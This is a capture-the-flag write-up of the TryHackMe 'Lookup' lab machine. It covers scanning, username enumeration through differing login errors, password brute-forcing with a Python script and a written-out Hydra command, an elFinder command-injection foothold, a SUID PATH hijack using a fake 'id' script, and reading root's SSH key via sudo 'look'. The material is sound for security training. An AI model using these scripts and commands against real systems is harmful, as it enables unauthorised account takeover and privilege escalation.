From Basic Enumeration to Root | TryHackMe Lookup

In this post, we walk through the TryHackMe boot-to-root machine Lookup, following the usual flow: Nmap scanning, then web enumeration, which turns up a login form. Because the form answers differently for valid and invalid usernames, we write a small Python script to enumerate valid accounts and then use Hydra to brute-force the password. After authenticating we reach a file manager (elFinder) hosted on a subdomain; the deployed version is vulnerable to a PHP command injection, and the exploit can be run through Metasploit to obtain an initial foothold as www-data. We move laterally to a second user by abusing a SUID binary that trusts its PATH, then use a GTFOBins technique on a sudo-permitted binary to obtain root.

1. Initial Scanning

  • The presenter starts with an Nmap scan to identify open ports and services on the target machine. The scan reveals two open ports:
  • Port 22: SSH
  • Port 80: HTTP
  • An aggressive scan (service and version detection plus default scripts) is acceptable here because the target is a lab machine; against a production network the same noisy scan could trip a firewall or IDS.

2. Web Application Enumeration

  • Accessing the web service on port 80 reveals a login form. The site's hostname is added to /etc/hosts so that it resolves to the target IP.
  • Default credentials (admin:admin) are tried first, but they fail.
  • Using Burp Suite, the presenter intercepts the login request and notices that the server's error message differs depending on whether the submitted username exists. This is a user-enumeration weakness, and it is what makes the next step possible.

3. Brute Force Attack

  • A short Python script submits each candidate username with a dummy password and keeps those for which the server returns the "valid user" variant of the error.
  • The script identifies two valid usernames: admin and Jose.
  • Hydra is then pointed at the form with Jose as the fixed username and a password wordlist, and finds the password: password123.
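The two steps above, enumerate usernames from the response difference and then brute-force the password of a confirmed user, as an added example. This is not the presenter's script (the post does not reproduce it); the endpoint `/login.php`, the field names `username`/`password` and the two error strings are assumptions that you would confirm in Burp first. The fake server at the bottom is constructed so the script runs offline; `http_sender` is the function you would pass instead against the real form.

```python
from typing import Callable, Dict, Iterable, List, Optional

# ASSUMPTIONS (not from the post): the form's endpoint, its field names and the
# two distinguishable error strings. Confirm them in Burp before use.
LOGIN_URL = "http://lookup.thm/login.php"
INVALID_USER_MSG = "Wrong username or password."
WRONG_PASSWORD_MSG = "Wrong password."

# A sender submits one (username, password) pair and returns the response body.
Sender = Callable[[str, str], str]


def classify(body: str) -> str:
    """Turn a login response into 'no-user', 'valid-user' or 'success'.

    Anything carrying neither error string is treated as success, so a hit
    still deserves a manual look (an error page would land here as well).
    """
    if INVALID_USER_MSG in body:
        return "no-user"
    if WRONG_PASSWORD_MSG in body:
        return "valid-user"
    return "success"


def enumerate_users(candidates: Iterable[str], send: Sender,
                    probe_password: str = "invalid-probe") -> List[str]:
    """Return every candidate the server does NOT reject as an unknown user."""
    return [user for user in candidates
            if classify(send(user, probe_password)) != "no-user"]


def brute_force_password(user: str, candidates: Iterable[str],
                         send: Sender) -> Optional[str]:
    """Try each password for a known-valid user; return the first that logs in."""
    for password in candidates:
        if classify(send(user, password)) == "success":
            return password
    return None


def http_sender(username: str, password: str) -> str:
    """Real sender for the target: POSTs the form and returns the body.

    requests is imported here so the offline demo below does not need it.
    """
    import requests
    resp = requests.post(LOGIN_URL,
                         data={"username": username, "password": password},
                         timeout=10, allow_redirects=False)
    return resp.text


def make_fake_server(accounts: Dict[str, str]) -> Sender:
    """Constructed stand-in for the target so the script runs offline.

    It reproduces the behaviour the post describes: one message for an
    unknown user, a different one for a wrong password.
    """
    def send(username: str, password: str) -> str:
        if username not in accounts:
            return f"<p>{INVALID_USER_MSG}</p>"
        if accounts[username] != password:
            return f"<p>{WRONG_PASSWORD_MSG}</p>"
        return "<p>Login successful</p>"
    return send


if __name__ == "__main__":
    # Constructed sample data; password123 is the password the post reports.
    fake = make_fake_server({"admin": "not-in-this-list", "jose": "password123"})
    wordlist = ["root", "admin", "guest", "jose", "test", "user"]
    users = enumerate_users(wordlist, fake)
    print("valid users:", users)
    for user in users:
        hit = brute_force_password(user, ["123456", "password", "password123"], fake)
        print(f"{user}: {hit}")
```

The same oracle drives Hydra: with the assumed path and field names, `hydra -l jose -P /usr/share/wordlists/rockyou.txt lookup.thm http-post-form "/login.php:username=^USER^&password=^PASS^:F=Wrong password"` tells Hydra to treat any response containing the wrong-password string as a failure, which is exactly the `valid-user` branch of `classify` above.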

4. Exploitation of the Web Application

  • After logging in as Jose, the interface is a web-based file manager listing various files.
  • Among them is a file named credentials, which contains a username (think) but no password.
  • The file manager identifies itself as elFinder, and the version it displays is known to be vulnerable.
  • Using SearchSploit, the presenter finds an exploit matching that version (the PHP command injection noted in the introduction, also available as a Metasploit module) and uses it to obtain a reverse shell on the machine.

5. Privilege Escalation

  • The initial shell runs as the www-data user. The goal is to escalate to think and then to root.
  • Exploring the system reveals a SUID binary named pwm. It runs with its owner's privileges and, to decide which user invoked it, calls the id command by name (so it is resolved through PATH) before reading that user's password file.
  • By placing a fake id executable first in PATH that reports the caller as think, the presenter tricks pwm into believing it is running as think. pwm then prints the contents of a file named passwords from think's home directory.
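The PATH hijack from the last bullet, shown as an added Python demonstration (not the room's pwm binary, whose source the post does not include). The fake `id` script is constructed here, the user name think is the one the post names, `user_via_path_lookup` stands in for what pwm does, and `user_via_getuid` is the hardened alternative that a SUID program should use instead.

```python
import os
import pwd
import subprocess
import tempfile
from typing import Dict, Tuple

# The account named on the page; any string works for the demonstration.
SPOOFED_USER = "think"


def write_fake_id(directory: str, username: str) -> str:
    """Drop an executable named `id` that prints a forged line in id(1)'s format."""
    path = os.path.join(directory, "id")
    with open(path, "w") as fh:
        fh.write("#!/bin/sh\n")
        fh.write(f'echo "uid=1000({username}) gid=1000({username}) '
                 f'groups=1000({username})"\n')
    os.chmod(path, 0o755)
    return path


def user_via_path_lookup(env: Dict[str, str]) -> str:
    """Vulnerable pattern (what pwm relies on): run `id` found through PATH and
    parse the name out of 'uid=NNN(name) ...'. Whoever controls PATH controls
    the answer, which is fatal inside a SUID binary."""
    out = subprocess.run(["id"], env=env, capture_output=True,
                         text=True, check=True).stdout
    return out.split("(", 1)[1].split(")", 1)[0]


def user_via_getuid() -> str:
    """Hardened alternative: ask the kernel for the real uid and resolve it
    locally. No external program is run, so PATH cannot influence it."""
    uid = os.getuid()
    try:
        return pwd.getpwuid(uid).pw_name
    except KeyError:  # uid without a passwd entry, common in containers
        return str(uid)


def demo_path_hijack(spoof: str = SPOOFED_USER) -> Tuple[str, str]:
    """Return (what the PATH-based lookup reports, what getuid reports)
    after a fake `id` has been placed first in PATH."""
    with tempfile.TemporaryDirectory() as tmp:
        write_fake_id(tmp, spoof)
        hijacked_env = dict(os.environ)
        hijacked_env["PATH"] = tmp + os.pathsep + hijacked_env.get("PATH", "/usr/bin:/bin")
        return user_via_path_lookup(hijacked_env), user_via_getuid()


if __name__ == "__main__":
    forged, real = demo_path_hijack()
    print(f"PATH-resolved `id` says: {forged}  (forged)")
    print(f"getuid() says:           {real}")
```

Against the real binary the same three moves are done from the shell: write the fake id into a directory you can write to, make it executable, prepend that directory to PATH, and run pwm. The fix on the defender's side is the `getuid` version: a SUID program must not trust PATH, and if it really has to spawn a helper it should use an absolute path.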

6. Further Enumeration and Root Escalation

  • The recovered password list is fed to Hydra to brute-force SSH for the user think.
  • Logged in as think, enumeration (sudo -l) shows that the user may run the look binary as root.
  • As documented on GTFOBins, look can be made to print arbitrary files, so it is used to read the root user's private SSH key.
  • With that key, the presenter logs in as root and retrieves both the user and root flags.

Key Techniques Demonstrated

  • Reconnaissance: Utilizing Nmap and Burp Suite for initial scans and enumeration.
  • Brute Forcing: Using custom scripts and tools like Hydra to discover credentials.
  • Exploitation: Identifying and exploiting vulnerabilities using tools like SearchSploit.
  • Privilege Escalation: PATH hijacking against a SUID binary to reach a second user, then a sudo-permitted binary (look) abused to read root's SSH key.
